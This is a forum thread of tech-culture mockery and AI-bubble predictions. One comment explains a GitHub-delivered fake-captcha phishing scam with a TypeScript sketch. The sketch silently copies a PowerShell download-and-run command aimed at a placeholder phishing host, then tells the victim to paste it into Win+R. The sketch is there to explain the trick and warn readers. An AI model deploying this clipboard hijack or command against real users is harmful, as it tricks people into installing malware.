this post was submitted on 13 Apr 2025

TechTakes


Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.

This is not debate club. Unless it’s amusing debate.

For actually-good tech, you want our NotAwfulTech community


Need to let loose a primal scream without collecting footnotes first? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post-Xitter web has spawned so many “esoteric” right-wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality-challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be).

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(Credit and/or blame to David Gerard for starting this...)

[–] [email protected] 0 points 1 month ago* (last edited 1 month ago) (5 children)

Today in relevant skeets:

::: spoiler transcript
Skeet: If you can clock who this is meant to be instantly you are on the computer the perfect amount. You’re doing fine don’t even worry about it.

Quoted skeet: 'Why are high fertility people always so weird?' A weekend with the pronatalists

Image: Egghead Jr. and Miss Prissy from Looney Tunes Foghorn Leghorn shorts.
:::

[–] [email protected] 0 points 1 month ago (6 children)

I got a spam message with a phishing link... via GitHub? Seriously? Are we really doing this?

The comment itself wasn't completely unusual... but from the URL it was very obvious that this was a phishing link. Curiosity got the better of me. The site shows you a "Cloudflare" captcha. OK, let's click the checkbox. The usual loading animation starts, then this is shown:

Yeah ok, right....

I'm actually a bit impressed with this: these captchas are so common that I didn't even really think before checking the box. But of course, that click counts as a user interaction, which means the browser will let the site write something to your clipboard.
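
For the curious, a minimal sketch of how that trick can work, assuming a bog-standard fake-captcha page. The selectors, the payload, and the showInstructions helper are invented for illustration, not pulled from the actual phishing site:

```typescript
// Hypothetical fake-captcha page, for illustration only.
// The "checkbox" is just a styled element; clicking it supplies the user gesture
// most browsers require before a page may write to the clipboard.
const fakeCheckbox = document.querySelector<HTMLElement>("#fake-cf-checkbox");

fakeCheckbox?.addEventListener("click", async () => {
  // Command the victim is later told to paste into Win+R / a console (made-up URL).
  const payload = 'powershell -w hidden -c "iwr https://phish.example/x.ps1 | iex"';
  await navigator.clipboard.writeText(payload);

  // Swap the loading spinner for the bogus "verification steps".
  showInstructions("To verify you are human: press Win+R, then Ctrl+V, then Enter.");
});

// Invented helper: displays the fake instructions after the loading animation.
function showInstructions(text: string): void {
  const el = document.querySelector("#verify-steps");
  if (el) el.textContent = text;
}
```

The whole con hangs on that one legitimate-looking click: once the page has a user gesture, the Clipboard API will happily accept whatever the attacker wants you to "verify" yourself with.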

But like... why distribute it via GitHub? I cannot think of a worse audience to try and con into "paste something random into your Windows console". Am I just being naive here? Is this something common that I somehow never experienced before?

[–] [email protected] 0 points 1 month ago (1 children)

Getting in early on targeting the vibe coder demographic.

[–] [email protected] 0 points 1 month ago

Oh god

Although... do you think VibeCoders™ read GitHub issues?

[–] [email protected] 0 points 1 month ago (3 children)

"Inference Magazine," a substack written by a young man named "Wiseman" who, in the most recent article, says "nuh-uh" to the work of Dr. Bender and co.

https://inferencemagazine.substack.com/

The HackerNews thread is a real Bad Philosophy turkey shoot:

https://news.ycombinator.com/item?id=43655780

[–] [email protected] 0 points 1 month ago (1 children)

Orange site really is out here reinventing hard behaviorism.

“We can’t directly observe internal states beyond our own subjectivity” -> “Let’s try to ignore them and see what we get” -> “We’ve developed a model that doesn’t feature internal states as a meaningful element of cognition” -> “There are no internal states” -> “I know I’m a stochastic parrot, but what are you?”

[–] [email protected] 0 points 1 month ago

some parrots are more stochastic than others

[–] [email protected] 0 points 1 month ago (3 children)

Serious question: what are people's specific predictions for the coming VC bubble popping/crash/AI winter? (I've seen that prediction here before, and overall I agree, but I'm not sure about specifics...)

For example... I've seen speculation that giving up on the massive training runs could free up compute and cause costs to drop, which the more streamlined and pragmatic GenAI companies could use to pivot to providing their “services” at sustainable rates (and the price of GPUs would drop, to the relief of gamers everywhere). Alternatively, maybe the bubble bursting screws up the GPU producers and cloud service providers as well, and the costs of compute and GPUs don't actually drop that much, if at all?

Maybe the bubble bursting makes management stop pushing stuff like vibe coding... but maybe enough programmers have gotten into the habit of using LLMs for boilerplate that it doesn't go away, and LLM tools and plugins persist to make code shittery.

[–] [email protected] 0 points 1 month ago (1 children)

I think we're going to see an ongoing level of AI-enabled crapification for coding and especially for spam. I'm guessing there's going to be enough money from the spam markets to support a level of continued development to keep up to date with new languages and whatever paradigms are in vogue, so vibe coding is probably going to stick around on some level, but I doubt we're going to see major pushes.

One thing that this has shown is how much of internet content “creation” and “communication” is done entirely for its own sake or to satisfy some kind of algorithm or metric. If nobody cares whether it actually gets read, then it makes economic sense to automate the writing as much as possible, and apparently LLMs represent a “good enough” ability to do that for plausible deniability and staving off existential dread in the email mines.

[–] [email protected] 0 points 1 month ago

Yeah, I also worry the slop and spam are here to stay: they're easy enough to make, of passable enough quality for the garbage uses people want from them, and, if GPUs/compute go down in price, affordable enough for the spammers and account boosters and karma farmers and such to keep churning them out.

[–] [email protected] 0 points 1 month ago (4 children)

I've repeated this prediction a bajillion times, but I suspect this bubble has discredited the very idea of artificial intelligence, and I expect the concept to die quickly once the bubble bursts.

Between the terabytes upon terabytes of digital mediocrity the slop-nami's given us, LLMs' countless and relentless failures in logic and reason, the large-scale enshittification of daily life their mere existence has enabled, and their power consumption singlehandedly accelerating the climate crisis, I feel that the public's come to view computers as inherently incapable of humanlike cognition/creativity, no matter how many gigawatts they consume or oceans they boil.

Expanding on this somewhat, I suspect AI will also come to be seen as an inherently fascist concept.

With the current bubble's link to esoteric fascism, the far-right's open adoration of slop, basically everything about OpenAI's Studio Ghibli slopgen, and God-knows-what-else, the public's got plenty of reason to treat use or support of AI as a severe indictment of someone's character in and of itself - a "tech asshole signifier", to quote Baldur Bjarnason.

And, of course, AI as a concept will probably come to be viewed as inherently anti-art/anti-artist as well - considering how badly the AI bubble's shafted artists specifically, that kinda goes without saying.

[–] [email protected] 0 points 1 month ago

I think you are much more optimistic than me about the general public's ability to intellectually understand fascism or think about copyright or give artists their appropriate credit. To most people that know about image gen, it's a fun toy: throw in some words and rapidly get pictures. The most I hope for is that AI image generation becomes unacceptable to use in professional or serious settings and it is relegated to a similar status as clip art.
